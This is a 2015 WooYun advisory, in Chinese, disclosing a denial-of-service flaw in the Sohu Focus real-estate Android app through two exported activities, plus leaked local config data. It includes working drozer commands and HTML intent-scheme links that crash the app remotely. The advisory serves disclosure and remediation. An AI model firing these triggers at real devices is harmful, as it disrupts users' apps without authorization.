当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120045

漏洞标题:搜狐焦点房产Android客户端敏感信息泄露及拒绝服务(可远程利用)

相关厂商:焦点房产

漏洞作者: 路人甲

提交时间:2015-06-12 16:55

修复时间:2015-09-10 17:08

公开时间:2015-09-10 17:08

漏洞类型:拒绝服务

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向第三方安全合作伙伴开放
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

拒绝服务及敏感信息泄露

详细说明:

Android版焦点房产客户端Activity组件对外暴露 导致恶意程序直接发送intent启动该Activity,组件对intent处理不当产生异常,导致应用程序进程崩溃。
本地配置文件包含敏感信息。

漏洞证明:

### 1 ### 客户端信息
官网下载的最新版本:v5.1.0
### 2 ###
AndroidManifest文件中定义的Activity组件,2个对外暴露的组件存在问题

<activity android:launchMode="singleTask" android:name="com.tencent.tauth.AuthActivity" android:noHistory="true" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="tencent100422662"/>
</intent-filter>
</activity>

<activity android:configChanges="keyboardHidden|orientation" android:name="cn.jpush.android.ui.PushActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Translucent.NoTitleBar">
<intent-filter>
<action android:name="cn.jpush.android.ui.PushActivity"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="com.sohu.focus.apartment"/>
</intent-filter>
</activity>


### POC ###
(1)本地利用,drozer

dz> run app.activity.start --component com.sohu.focus.apartment com.tencent.tauth.AuthActivity
dz> run app.activity.start --component com.sohu.focus.apartment cn.jpush.android.ui.PushActivity


(2)远程利用,IntentScheme

<h1><a href="intent:#Intent;component=com.sohu.focus.apartment/com.tencent.tauth.AuthActivity;end">START: com.tencent.tauth.AuthActivity</a></h1><br>
<h1><a href="intent:#Intent;component=com.sohu.focus.apartment/cn.jpush.android.ui.PushActivity;end">START: cn.jpush.android.ui.PushActivity</a></h1><br>


0.JPG


1.JPG


### 3 ### 本地配置文件敏感信息泄露

2.JPG


3.JPG


4.JPG

修复方案:

正确处理异常intent

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-12 17:06

厂商回复:

感谢支持。

最新状态:

暂无